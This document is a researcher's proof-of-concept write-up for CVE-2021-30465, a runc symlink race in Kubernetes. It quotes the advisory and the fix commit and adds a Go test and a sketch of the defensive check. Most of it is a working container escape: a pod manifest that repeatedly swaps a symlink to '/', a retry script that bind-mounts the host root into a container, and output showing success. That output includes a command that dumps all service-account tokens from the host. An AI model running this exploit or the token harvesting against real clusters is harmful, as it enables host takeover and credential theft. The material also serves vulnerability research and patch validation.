
CVE-2021-30465 POC

GH link

tests


func TestStripRoot(t *testing.T) {
	for _, test := range []struct {
		root, path, out string
	}{
		// Works with multiple components.
		{"/a/b", "/a/b/c", "/c"},
		{"/hello/world", "/hello/world/the/quick-brown/fox", "/the/quick-brown/fox"},
		// '/' must be a no-op.
		{"/", "/a/b/c", "/a/b/c"},
		// Must be the correct order.
		{"/a/b", "/a/c/b", "/a/c/b"},
		// Must be at start.
		{"/abc/def", "/foo/abc/def/bar", "/foo/abc/def/bar"},
		// Must be a lexical parent.
		{"/foo/bar", "/foo/barSAMECOMPONENT", "/foo/barSAMECOMPONENT"},
		// Must only strip the root once.
		{"/foo/bar", "/foo/bar/foo/bar/baz", "/foo/bar/baz"},
		// Deal with .. in a fairly sane way.
		{"/foo/bar", "/foo/bar/../baz", "/foo/baz"},
		{"/foo/bar", "../../../../../../foo/bar/baz", "/baz"},
		{"/foo/bar", "/../../../../../../foo/bar/baz", "/baz"},
		{"/foo/bar/../baz", "/foo/baz/bar", "/bar"},
		{"/foo/bar/../baz", "/foo/baz/../bar/../baz/./foo", "/foo"},
		// All paths are made absolute before stripping.
		{"foo/bar", "/foo/bar/baz/bee", "/baz/bee"},
		{"/foo/bar", "foo/bar/baz/beef", "/baz/beef"},
		{"foo/bar", "foo/bar/baz/beets", "/baz/beets"},
	} {
		got := stripRoot(test.root, test.path)
		if got != test.out {
			t.Errorf("stripRoot(%q, %q) -- got %q, expected %q", test.root, test.path, got, test.out)
		}
	}
}
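
For context, here is a minimal sketch of a stripRoot helper that passes the cases above (an illustrative reconstruction, not necessarily the exact runc code; assumes the usual path/filepath and strings imports): make both arguments absolute and lexically clean, then strip the root prefix exactly once.

// stripRoot strips a single leading root prefix from path. Both arguments
// are made absolute and lexically cleaned first, so "..", ".", and relative
// inputs behave the way the tests above expect.
func stripRoot(root, path string) string {
	root = filepath.Join("/", root)
	path = filepath.Join("/", path)

	switch {
	case path == root:
		path = "/"
	case root == "/":
		// Stripping "/" is a no-op.
	case strings.HasPrefix(path, root+"/"):
		// Strip the prefix exactly once ("must only strip the root once").
		path = strings.TrimPrefix(path, root+"/")
	}
	return filepath.Join("/", path)
}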

Text from the CVE:

However, it turns out with some container orchestrators (such as Kubernetes --
though it is very likely that other downstream users of runc could have similar
behaviour be accessible to untrusted users), the existence of additional volume
management infrastructure allows this attack to be applied to gain access to
the host filesystem without requiring the attacker to have completely arbitrary
control over container configuration.

In the case of Kubernetes, this is exploitable by creating a symlink in a
volume to the top-level (well-known) directory where volumes are sourced from
(for instance,
`/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir`), and then
using that symlink as the target of a mount. The source of the mount is an
attacker controlled directory, and thus the source directory from which
subsequent mounts will occur is an attacker-controlled directory. Thus the
attacker can first place a symlink to `/` in their malicious source directory
with the name of a volume, and a subsequent mount in the container will
bind-mount `/` into the container.

Applying this attack requires the attacker to start containers with a slightly
peculiar volume configuration (though not explicitly malicious-looking such as
bind-mounting `/` into the container explicitly), and be able to run malicious
code in a container that shares volumes with said volume configuration. It
helps the attacker if the host paths used for volume management are well known,
though this is not a hard requirement.

Text from the commit:

rootfs: add mount destination validation
Because the target of a mount is inside a container (which may be a
volume that is shared with another container), there exists a race
condition where the target of the mount may change to a path containing
a symlink after we have sanitised the path -- resulting in us
inadvertently mounting the path outside of the container.

This is not immediately useful because we are in a mount namespace with
MS_SLAVE mount propagation applied to "/", so we cannot mount on top of
host paths in the host namespace. However, if any subsequent mountpoints
in the configuration use a subdirectory of that host path as a source,
those subsequent mounts will use an attacker-controlled source path
(resolved within the host rootfs) -- allowing the bind-mounting of "/"
into the container.

While arguably configuration issues like this are not entirely within
runc's threat model, within the context of Kubernetes (and possibly
other container managers that provide semi-arbitrary container creation
privileges to untrusted users) this is a legitimate issue. Since we
cannot block mounting from the host into the container, we need to block
the first stage of this attack (mounting onto a path outside the
container).

The long-term plan to solve this would be to migrate to libpathrs, but
as a stop-gap we implement libpathrs-like path verification through
readlink(/proc/self/fd/$n) and then do mount operations through the
procfd once it's been verified to be inside the container. The target
could move after we've checked it, but if it is inside the container
then we can assume that it is safe for the same reason that libpathrs
operations would be safe.

A slight wrinkle is the "copyup" functionality we provide for tmpfs,
which is the only case where we want to do a mount on the host
filesystem. To facilitate this, I split out the copy-up functionality
entirely so that the logic isn't interspersed with the regular tmpfs
logic. In addition, all dependencies on m.Destination being overwritten
have been removed since that pattern was just begging to be a source of
more mount-target bugs (we do still have to modify m.Destination for
tmpfs-copyup but we only do it temporarily).

Fixes: CVE-2021-30465
Reported-by: Etienne Champetier <champetier.etienne@gmail.com>
Co-authored-by: Noah Meyerhans <nmeyerha@amazon.com>
Reviewed-by: Samuel Karp <skarp@amazon.com>
Reviewed-by: Kir Kolyshkin <kolyshkin@gmail.com> (@kolyshkin)
Reviewed-by: Akihiro Suda <akihiro.suda.cz@hco.ntt.co.jp>
Signed-off-by: Aleksa Sarai <cyphar@cyphar.com>
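
Rough sketch of the verification pattern the commit describes (illustrative only; the helper name and its exact checks are made up here, this is not runc's actual code): open the already-sanitised target with O_PATH, ask the kernel via readlink(/proc/self/fd/$n) where it really points, verify that path is still under the container root, then mount through the /proc/self/fd path so a last-second symlink swap can no longer redirect the mount.

package main

import (
	"fmt"
	"os"
	"strings"

	"golang.org/x/sys/unix"
)

// mountViaProcfd is a hypothetical helper (not runc's API) that bind-mounts
// source onto target, but only after re-verifying that the opened target
// still resolves to a path underneath rootfs.
func mountViaProcfd(rootfs, source, target string) error {
	// target is assumed to have already been sanitised (e.g. via SecureJoin).
	fd, err := unix.Open(target, unix.O_PATH|unix.O_CLOEXEC, 0)
	if err != nil {
		return err
	}
	defer unix.Close(fd)

	// Ask the kernel what this fd actually refers to. Unlike the target
	// string, the answer cannot be changed by swapping in a symlink now.
	procfd := fmt.Sprintf("/proc/self/fd/%d", fd)
	realpath, err := os.Readlink(procfd)
	if err != nil {
		return err
	}
	if realpath != rootfs && !strings.HasPrefix(realpath, rootfs+"/") {
		return fmt.Errorf("possibly malicious path detected: %s escapes %s", realpath, rootfs)
	}

	// Mount through the procfd path, which pins the verified inode.
	return unix.Mount(source, procfd, "", unix.MS_BIND, "")
}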

Dev setup is a kind cluster:

$▶ kind version
kind v0.11.0 go1.16.3 darwin/amd64
$▶ docker exec -ti kind-control-plane bash
root@kind-control-plane:/# runc --version
runc version 1.0.0-rc94
commit: 2c7861bc5e1b3e756392236553ec14a78a09f8bf
spec: 1.0.2-dev
go: go1.16.4
libseccomp: 2.5.1
root@kind-control-plane:/#

Second dev setup

$ kind version
kind v0.8.1 go1.14.2 darwin/amd64
$ docker exec -ti kind-control-plane bash
root@kind-control-plane:/# runc --version
runc version 1.0.0-rc10
spec: 1.0.1-dev

Theory 1.

This requires two different deployments that each target the same "mount point"

The first deployment mounts the volume and creates a symlink at a well-defined place in the node's fs.

The second deployment mounts the volume and follows the symlink to exploit town.

Theory 2

This is a single pod spec with multiple volumes, much like the subpath exploit, but with different symlink targets: one satisfies the "inside the container" check, yet has something else going for it that lets the second mount follow it back out.

Hacks

Learn the underlying host path for the shared volume:

grep empty /proc/1/task/1/mountinfo

1427 1406 254:1 /docker/volumes/d398781f9ae3253091092b07ff6e2875f7a67102c942996f7393ea1869a1df6d/_data/lib/kubelet/pods/5eb56535-4c29-4ccf-95a8-ac595b8c1b96/volumes/kubernetes.io~empty-dir/escape-volume/host /rootfs rw,relatime - ext4 /dev/vda1 rw
1428 1406 254:1 /docker/volumes/d398781f9ae3253091092b07ff6e2875f7a67102c942996f7393ea1869a1df6d/_data/lib/kubelet/pods/5eb56535-4c29-4ccf-95a8-ac595b8c1b96/volumes/kubernetes.io~empty-dir/status-volume /status rw,relatime - ext4 /dev/vda1 rw

symlink_race

pushed a symlink example container here: mauilion/symlinks:push

From Etienne

My exploit uses:
1) multiple containers
2) empty dir volumes / tmpfs (but some other types are likely usable)
3) mount into mounts, i.e.
    volumeMounts:
    - name: test1
      mountPath: /test1
    - name: test2
      mountPath: /test1/mnt2

If you can forbid mounts into mounts, you prevent this attack.

Don't hesitate to ping me in public issue if needed

more hacks.

initial attempt

---
apiVersion: v1
kind: Pod
metadata:
  name: honk
spec:
  containers:
  - image: nginx:stable
    name: prehonk
    imagePullPolicy: "IfNotPresent"
    command: ["/bin/bash"]
    args: ["-xc", "cd /mnt1 && ln -s / mnt2 "]
    volumeMounts:
    - mountPath: /mnt1
      name: test1
  - image: nginx:stable
    name: exploit
    imagePullPolicy: "IfNotPresent"
    command: ["/bin/bash"]
    args: ["-c", "sleep infinity"]
    volumeMounts:
    - mountPath: /test1/mnt2
      name: test2
    - mountPath: /test1
      name: test1

  volumes:
  - name: test1
    emptyDir: {}
  - name: test2
    emptyDir: {}
---
apiVersion: v1
kind: Pod
metadata:
  name: honk
spec:
  initContainers:
  - image: nginx:stable
    name: prehonk
    imagePullPolicy: "IfNotPresent"
    command: ["/bin/bash"]
    args: ["-xc", "mkdir -p $(grep rootfs /proc/1/task/1/mountinfo | awk \'{print $4}\' | sed s/escape-volume//) && cd /rootfs && ln -s / $(grep rootfs /proc/1/task/1/mountinfo | awk \'{print $4}\' | sed s/escape/status/)"]
    volumeMounts:
    - mountPath: /rootfs
      name: escape-volume
  containers:
  - image: nginx:stable
    name: exploitj
    imagePullPolicy: "IfNotPresent"
    command: ["/bin/bash"]
    args: ["-c", "sleep infinity"]
    volumeMounts:
    - mountPath: /rootfs/status
      name: escape-volume
  volumes:
  - name: escape-volume
    emptyDir: {}
  - name: status-volume
    emptyDir: {}

Trick to grab logs for a failed pod on the host: this finds the recently exited prehonk container and pulls its logs.

root@kind-control-plane:/> crictl logs $(crictl ps -a | grep prehonk | awk '{print $1}')
+ cd /mnt1
+ ln -s / mnt2
ln: failed to create symbolic link 'mnt2/': File exists

Working exploit code:

# honk-pod.yaml
---
apiVersion: v1
kind: Pod
metadata:
  name: honk
spec:
  #securityContext:
    #runAsUser: 1000
    #runAsGroup: 1000
  containers:
  - image: nginx:latest
    imagePullPolicy: IfNotPresent
    name: 0-link0
    command: ["/bin/bash"]
    args: ["-xc", "cd /honk; while true; do rm -rf host; ln -s / host; done;"]
    volumeMounts:
    - mountPath: /honk
      name: escape-volume
  - image: nginx:latest
    imagePullPolicy: Always
    name: 1-honk
    command: ["sleep", "infinity"]
    volumeMounts:
    - mountPath: /honk
      name: escape-volume
    - mountPath: /honk/host
      name: host-volume
  - image: nginx:latest
    imagePullPolicy: Always
    name: 2-honk
    command: ["sleep", "infinity"]
    volumeMounts:
    - mountPath: /honk
      name: escape-volume
    - mountPath: /honk/host
      name: host-volume
  - image: nginx:latest
    imagePullPolicy: Always
    name: 3-honk
    command: ["sleep", "infinity"]
    volumeMounts:
    - mountPath: /honk
      name: escape-volume
    - mountPath: /honk/host
      name: host-volume
  volumes:
  - name: escape-volume
    emptyDir: {}
  - name: host-volume
    emptyDir: {}
# honk.sh
#!/usr/bin/env bash

RUNS=1
while [ $RUNS -lt 100 ]; do

  kubectl delete -f honk-pod.yaml --grace-period=0 --force 2> /dev/null
  sleep 3
  kubectl apply -f honk-pod.yaml
  kubectl wait -f honk-pod.yaml --for condition=Ready --timeout=30s 2> /dev/null
  COUNTER=1
  while [ $COUNTER -lt 4 ]; do
    echo -n "Checking $COUNTER-honk for the host mount..."
    # Count the PID directories; if there are more than 5, we are looking
    # at the host's /proc, which means success.
    if [[ "$(kubectl exec -it honk -c $COUNTER-honk -- find /proc -maxdepth 1 ! -name '*[!0-9]*' 2>/dev/null | wc -l)" -gt 5 ]]; then

    # GKE
    #if [ "$(kubectl exec -it honk -c $COUNTER-honk -- /home/kubernetes/bin/crictl ps 2> /dev/null | wc -l | awk '{print $1}')" -ne '0' ]; then
    # Kind
    #if [ "$(kubectl exec -it honk -c $COUNTER-honk -- runc list 2> /dev/null | wc -l | awk '{print $1}')" -ne '0' ]; then
    # Civo/k3s
    #if [ "$(kubectl exec -it honk -c $COUNTER-honk -- k3s -v 2> /dev/null | wc -l | awk '{print $1}')" -ne '0' ]; then
      echo "SUCCESS after $RUNS runs!"
      echo "Run kubectl exec -it honk -c $COUNTER-honk -- bash"
      exit 0
    else
      echo "nope."
    fi
    let COUNTER=$COUNTER+1
  done
 
  let RUNS=$RUNS+1
done
$ ./honk.sh
pod "honk" force deleted
pod/honk created
pod/honk condition met
Checking 1-honk for the host mount...nope.
Checking 2-honk for the host mount...nope.
Checking 3-honk for the host mount...nope.
...snip...
pod "honk" force deleted
pod/honk created
pod/honk condition met
Checking 1-honk for the host mount...nope.
Checking 2-honk for the host mount...nope.
Checking 3-honk for the host mount...nope.
pod "honk" force deleted
pod/honk created
pod/honk condition met
Checking 1-honk for the host mount...nope.
Checking 2-honk for the host mount...nope.
Checking 3-honk for the host mount...SUCCESS after 22 runs!
Run kubectl exec -it honk -c 3-honk -- bash

By seeing /run/runc in the exploit container, we know the hostpath mount is working, because that path only exists on the underlying node and not inside our nginx container. This may vary per target, but it's easy enough to adjust if needed.

$ kubectl exec -it exploit -c 3-honk -- bash
root@honk:/# ls
bin  boot  dev  etc  home  kind  lib  lib32  lib64  libx32  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
root@honk:/# 
$ kubectl exec -it exploit -c 3-honk -- crictl ps
CONTAINER           IMAGE               CREATED             STATE               NAME                      ATTEMPT             POD ID
f354220ae48d3       f0b8a9a541369       8 minutes ago       Running             3-honk                    2                   d6cfcd0c10c43
847a2f406e30f       f0b8a9a541369       8 minutes ago       Running             2-honk                    0                   d6cfcd0c10c43
7d6994acef655       f0b8a9a541369       8 minutes ago       Running             1-honk                    0                   d6cfcd0c10c43
36ac6b9ef00d0       f0b8a9a541369       8 minutes ago       Running             0-link                    0                   d6cfcd0c10c43
c672feb53eaa9       e422121c9c5f9       18 hours ago        Running             local-path-provisioner    0                   aedc00f117150
8a3fea897c809       bfe3a36ebd252       18 hours ago        Running             coredns                   0                   cbda6967dd1f7
afe11ac87a75e       bfe3a36ebd252       18 hours ago        Running             coredns                   0                   6f26d4dcd0e2e
79d5da0a84ef1       6b17089e24fdb       18 hours ago        Running             kindnet-cni               0                   8539b3556a14b
e9b44cb76c812       23b52beab6e55       18 hours ago        Running             kube-proxy                0                   815a6a9064842
c80612e8c9e52       0369cf4303ffd       18 hours ago        Running             etcd                      0                   0563e084fe6ee
09ef10a38b9e8       51dc9758caa7b       18 hours ago        Running             kube-controller-manager   0                   c566b807c748b
d0f8fb646cd32       3ad0575b6f104       18 hours ago        Running             kube-apiserver            0                   327abdbfe5320
396e975f0500a       cd40419687469       18 hours ago        Running             kube-scheduler            0                   950216aec91d8
root@honk:/# amicontained
Container Runtime: docker
Has Namespaces:
	pid: true
	user: false
AppArmor Profile: unconfined
Capabilities:
	BOUNDING -> chown dac_override fowner fsetid kill setgid setuid setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap
Seccomp: disabled
Blocked Syscalls (20):
	MSGRCV SYSLOG SETSID VHANGUP PIVOT_ROOT ACCT SETTIMEOFDAY UMOUNT2 SWAPON SWAPOFF REBOOT SETHOSTNAME SETDOMAINNAME INIT_MODULE DELETE_MODULE LOOKUP_DCOOKIE FANOTIFY_INIT OPEN_BY_HANDLE_AT FINIT_MODULE BPF
Looking for Docker.sock
# find -L /var/lib/kubelet/pods/*/volumes/kubernetes.io~secret/*/token -print -exec cat {} \; | sed -e 's/\/var/\r\n\/var/g';

/var/lib/kubelet/pods/05415399-22a8-4203-935f-fb7ff6662d01/volumes/kubernetes.io~secret/kindnet-token-49xqw/token
eyJhbGciO...
/var/lib/kubelet/pods/339bd96c-a6c9-434e-8cbf-41450eeeebd8/volumes/kubernetes.io~secret/kube-proxy-token-krck6/token
eyJhbGciO...
/var/lib/kubelet/pods/64ca5b3b-c68b-4ca9-b85e-c0304ba691c8/volumes/kubernetes.io~secret/coredns-token-vh96r/token
eyJhbGciO...
/var/lib/kubelet/pods/74a4d033-f7f3-4f86-88e6-88bd9266de17/volumes/kubernetes.io~secret/local-path-provisioner-service-account-token-5gvlp/token
eyJhbGciO...
/var/lib/kubelet/pods/7691bf45-3159-4f40-b054-f52144871e5b/volumes/kubernetes.io~secret/coredns-token-vh96r/token
eyJhbGciO...
/var/lib/kubelet/pods/b50b2a73-9265-4090-9b27-1d5d2cf00942/volumes/kubernetes.io~secret/default-token-bxhkj/token
eyJhbGciO...

Inspect an exploited container from the host

# crictl inspect e1e8927a546a6
{
  "status": {
    "id": "e1e8927a546a60ec3f5e4dc1fe25a756b2a1f48080d9a1db34fd32ed94d89220",
    "metadata": {
      "attempt": 0,
      "name": "2-exploit"
    },
    "state": "CONTAINER_RUNNING",
    "createdAt": "2021-05-21T00:52:20.8831732Z",
    "startedAt": "2021-05-21T00:52:21.0110818Z",
    "finishedAt": "1970-01-01T00:00:00Z",
    "exitCode": 0,
    "image": {
      "annotations": {},
      "image": "docker.io/library/nginx:latest"
    },
    "imageRef": "docker.io/library/nginx@sha256:df13abe416e37eb3db4722840dd479b00ba193ac6606e7902331dcea50f4f1f2",
    "reason": "",
    "message": "",
    "labels": {
      "io.kubernetes.container.name": "2-exploit",
      "io.kubernetes.pod.name": "exploit",
      "io.kubernetes.pod.namespace": "default",
      "io.kubernetes.pod.uid": "72c63ff5-05fd-465d-81c0-8bcfdd58edb3"
    },
    "annotations": {
      "io.kubernetes.container.hash": "b5a5fa",
      "io.kubernetes.container.restartCount": "0",
      "io.kubernetes.container.terminationMessagePath": "/dev/termination-log",
      "io.kubernetes.container.terminationMessagePolicy": "File",
      "io.kubernetes.pod.terminationGracePeriod": "30"
    },
    "mounts": [
      {
        "containerPath": "/rootfs",
        "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/escape-volume",
        "propagation": "PROPAGATION_PRIVATE",
        "readonly": false,
        "selinuxRelabel": false
      },
      {
        "containerPath": "/rootfs/host",
        "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/host-volume",
        "propagation": "PROPAGATION_PRIVATE",
        "readonly": false,
        "selinuxRelabel": false
      },
      {
        "containerPath": "/var/run/secrets/kubernetes.io/serviceaccount",
        "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~secret/default-token-bxhkj",
        "propagation": "PROPAGATION_PRIVATE",
        "readonly": true,
        "selinuxRelabel": false
      },
      {
        "containerPath": "/etc/hosts",
        "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts",
        "propagation": "PROPAGATION_PRIVATE",
        "readonly": false,
        "selinuxRelabel": false
      },
      {
        "containerPath": "/dev/termination-log",
        "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/2-exploit/6770f37a",
        "propagation": "PROPAGATION_PRIVATE",
        "readonly": false,
        "selinuxRelabel": false
      }
    ],
    "logPath": "/var/log/pods/default_exploit_72c63ff5-05fd-465d-81c0-8bcfdd58edb3/2-exploit/0.log"
  },
  "info": {
    "sandboxID": "f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8",
    "pid": 2894296,
    "removing": false,
    "snapshotKey": "e1e8927a546a60ec3f5e4dc1fe25a756b2a1f48080d9a1db34fd32ed94d89220",
    "snapshotter": "overlayfs",
    "runtimeType": "io.containerd.runc.v2",
    "runtimeOptions": null,
    "config": {
      "metadata": {
        "name": "2-exploit"
      },
      "image": {
        "image": "sha256:f0b8a9a541369db503ff3b9d4fa6de561b300f7363920c2bff4577c6c24c5cf6"
      },
      "command": [
        "sleep",
        "infinity"
      ],
      "envs": [
        {
          "key": "KUBERNETES_PORT_443_TCP_ADDR",
          "value": "10.96.0.1"
        },
        {
          "key": "KUBERNETES_SERVICE_HOST",
          "value": "10.96.0.1"
        },
        {
          "key": "KUBERNETES_SERVICE_PORT",
          "value": "443"
        },
        {
          "key": "KUBERNETES_SERVICE_PORT_HTTPS",
          "value": "443"
        },
        {
          "key": "KUBERNETES_PORT",
          "value": "tcp://10.96.0.1:443"
        },
        {
          "key": "KUBERNETES_PORT_443_TCP",
          "value": "tcp://10.96.0.1:443"
        },
        {
          "key": "KUBERNETES_PORT_443_TCP_PROTO",
          "value": "tcp"
        },
        {
          "key": "KUBERNETES_PORT_443_TCP_PORT",
          "value": "443"
        }
      ],
      "mounts": [
        {
          "container_path": "/rootfs",
          "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/escape-volume"
        },
        {
          "container_path": "/rootfs/host",
          "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/host-volume"
        },
        {
          "container_path": "/var/run/secrets/kubernetes.io/serviceaccount",
          "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~secret/default-token-bxhkj",
          "readonly": true
        },
        {
          "container_path": "/etc/hosts",
          "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts"
        },
        {
          "container_path": "/dev/termination-log",
          "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/2-exploit/6770f37a"
        }
      ],
      "labels": {
        "io.kubernetes.container.name": "2-exploit",
        "io.kubernetes.pod.name": "exploit",
        "io.kubernetes.pod.namespace": "default",
        "io.kubernetes.pod.uid": "72c63ff5-05fd-465d-81c0-8bcfdd58edb3"
      },
      "annotations": {
        "io.kubernetes.container.hash": "b5a5fa",
        "io.kubernetes.container.restartCount": "0",
        "io.kubernetes.container.terminationMessagePath": "/dev/termination-log",
        "io.kubernetes.container.terminationMessagePolicy": "File",
        "io.kubernetes.pod.terminationGracePeriod": "30"
      },
      "log_path": "2-exploit/0.log",
      "linux": {
        "resources": {
          "cpu_period": 100000,
          "cpu_shares": 2,
          "oom_score_adj": 1000,
          "hugepage_limits": [
            {
              "page_size": "1GB"
            },
            {
              "page_size": "2MB"
            }
          ]
        },
        "security_context": {
          "namespace_options": {
            "pid": 1
          },
          "run_as_user": {},
          "masked_paths": [
            "/proc/acpi",
            "/proc/kcore",
            "/proc/keys",
            "/proc/latency_stats",
            "/proc/timer_list",
            "/proc/timer_stats",
            "/proc/sched_debug",
            "/proc/scsi",
            "/sys/firmware"
          ],
          "readonly_paths": [
            "/proc/asound",
            "/proc/bus",
            "/proc/fs",
            "/proc/irq",
            "/proc/sys",
            "/proc/sysrq-trigger"
          ]
        }
      }
    },
    "runtimeSpec": {
      "ociVersion": "1.0.2-dev",
      "process": {
        "user": {
          "uid": 0,
          "gid": 0
        },
        "args": [
          "sleep",
          "infinity"
        ],
        "env": [
          "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
          "HOSTNAME=exploit",
          "NGINX_VERSION=1.19.10",
          "NJS_VERSION=0.5.3",
          "PKG_RELEASE=1~buster",
          "KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1",
          "KUBERNETES_SERVICE_HOST=10.96.0.1",
          "KUBERNETES_SERVICE_PORT=443",
          "KUBERNETES_SERVICE_PORT_HTTPS=443",
          "KUBERNETES_PORT=tcp://10.96.0.1:443",
          "KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443",
          "KUBERNETES_PORT_443_TCP_PROTO=tcp",
          "KUBERNETES_PORT_443_TCP_PORT=443"
        ],
        "cwd": "/",
        "capabilities": {
          "bounding": [
            "CAP_CHOWN",
            "CAP_DAC_OVERRIDE",
            "CAP_FSETID",
            "CAP_FOWNER",
            "CAP_MKNOD",
            "CAP_NET_RAW",
            "CAP_SETGID",
            "CAP_SETUID",
            "CAP_SETFCAP",
            "CAP_SETPCAP",
            "CAP_NET_BIND_SERVICE",
            "CAP_SYS_CHROOT",
            "CAP_KILL",
            "CAP_AUDIT_WRITE"
          ],
          "effective": [
            "CAP_CHOWN",
            "CAP_DAC_OVERRIDE",
            "CAP_FSETID",
            "CAP_FOWNER",
            "CAP_MKNOD",
            "CAP_NET_RAW",
            "CAP_SETGID",
            "CAP_SETUID",
            "CAP_SETFCAP",
            "CAP_SETPCAP",
            "CAP_NET_BIND_SERVICE",
            "CAP_SYS_CHROOT",
            "CAP_KILL",
            "CAP_AUDIT_WRITE"
          ],
          "inheritable": [
            "CAP_CHOWN",
            "CAP_DAC_OVERRIDE",
            "CAP_FSETID",
            "CAP_FOWNER",
            "CAP_MKNOD",
            "CAP_NET_RAW",
            "CAP_SETGID",
            "CAP_SETUID",
            "CAP_SETFCAP",
            "CAP_SETPCAP",
            "CAP_NET_BIND_SERVICE",
            "CAP_SYS_CHROOT",
            "CAP_KILL",
            "CAP_AUDIT_WRITE"
          ],
          "permitted": [
            "CAP_CHOWN",
            "CAP_DAC_OVERRIDE",
            "CAP_FSETID",
            "CAP_FOWNER",
            "CAP_MKNOD",
            "CAP_NET_RAW",
            "CAP_SETGID",
            "CAP_SETUID",
            "CAP_SETFCAP",
            "CAP_SETPCAP",
            "CAP_NET_BIND_SERVICE",
            "CAP_SYS_CHROOT",
            "CAP_KILL",
            "CAP_AUDIT_WRITE"
          ]
        },
        "oomScoreAdj": 1000
      },
      "root": {
        "path": "rootfs"
      },
      "mounts": [
        {
          "destination": "/proc",
          "type": "proc",
          "source": "proc",
          "options": [
            "nosuid",
            "noexec",
            "nodev"
          ]
        },
        {
          "destination": "/dev",
          "type": "tmpfs",
          "source": "tmpfs",
          "options": [
            "nosuid",
            "strictatime",
            "mode=755",
            "size=65536k"
          ]
        },
        {
          "destination": "/dev/pts",
          "type": "devpts",
          "source": "devpts",
          "options": [
            "nosuid",
            "noexec",
            "newinstance",
            "ptmxmode=0666",
            "mode=0620",
            "gid=5"
          ]
        },
        {
          "destination": "/dev/mqueue",
          "type": "mqueue",
          "source": "mqueue",
          "options": [
            "nosuid",
            "noexec",
            "nodev"
          ]
        },
        {
          "destination": "/sys",
          "type": "sysfs",
          "source": "sysfs",
          "options": [
            "nosuid",
            "noexec",
            "nodev",
            "ro"
          ]
        },
        {
          "destination": "/sys/fs/cgroup",
          "type": "cgroup",
          "source": "cgroup",
          "options": [
            "nosuid",
            "noexec",
            "nodev",
            "relatime",
            "ro"
          ]
        },
        {
          "destination": "/rootfs",
          "type": "bind",
          "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/escape-volume",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/rootfs/host",
          "type": "bind",
          "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/host-volume",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/etc/hosts",
          "type": "bind",
          "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/dev/termination-log",
          "type": "bind",
          "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/2-exploit/6770f37a",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/etc/hostname",
          "type": "bind",
          "source": "/var/lib/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/hostname",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/etc/resolv.conf",
          "type": "bind",
          "source": "/var/lib/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/resolv.conf",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/dev/shm",
          "type": "bind",
          "source": "/run/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/shm",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/var/run/secrets/kubernetes.io/serviceaccount",
          "type": "bind",
          "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~secret/default-token-bxhkj",
          "options": [
            "rbind",
            "rprivate",
            "ro"
          ]
        }
      ],
      "annotations": {
        "io.kubernetes.cri.container-name": "2-exploit",
        "io.kubernetes.cri.container-type": "container",
        "io.kubernetes.cri.sandbox-id": "f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8"
      },
      "linux": {
        "resources": {
          "devices": [
            {
              "allow": false,
              "access": "rwm"
            }
          ],
          "memory": {},
          "cpu": {
            "shares": 2,
            "period": 100000
          }
        },
        "cgroupsPath": "/kubelet/kubepods/besteffort/pod72c63ff5-05fd-465d-81c0-8bcfdd58edb3/e1e8927a546a60ec3f5e4dc1fe25a756b2a1f48080d9a1db34fd32ed94d89220",
        "namespaces": [
          {
            "type": "pid"
          },
          {
            "type": "ipc",
            "path": "/proc/2893298/ns/ipc"
          },
          {
            "type": "uts",
            "path": "/proc/2893298/ns/uts"
          },
          {
            "type": "mount"
          },
          {
            "type": "network",
            "path": "/proc/2893298/ns/net"
          }
        ],
        "maskedPaths": [
          "/proc/acpi",
          "/proc/kcore",
          "/proc/keys",
          "/proc/latency_stats",
          "/proc/timer_list",
          "/proc/timer_stats",
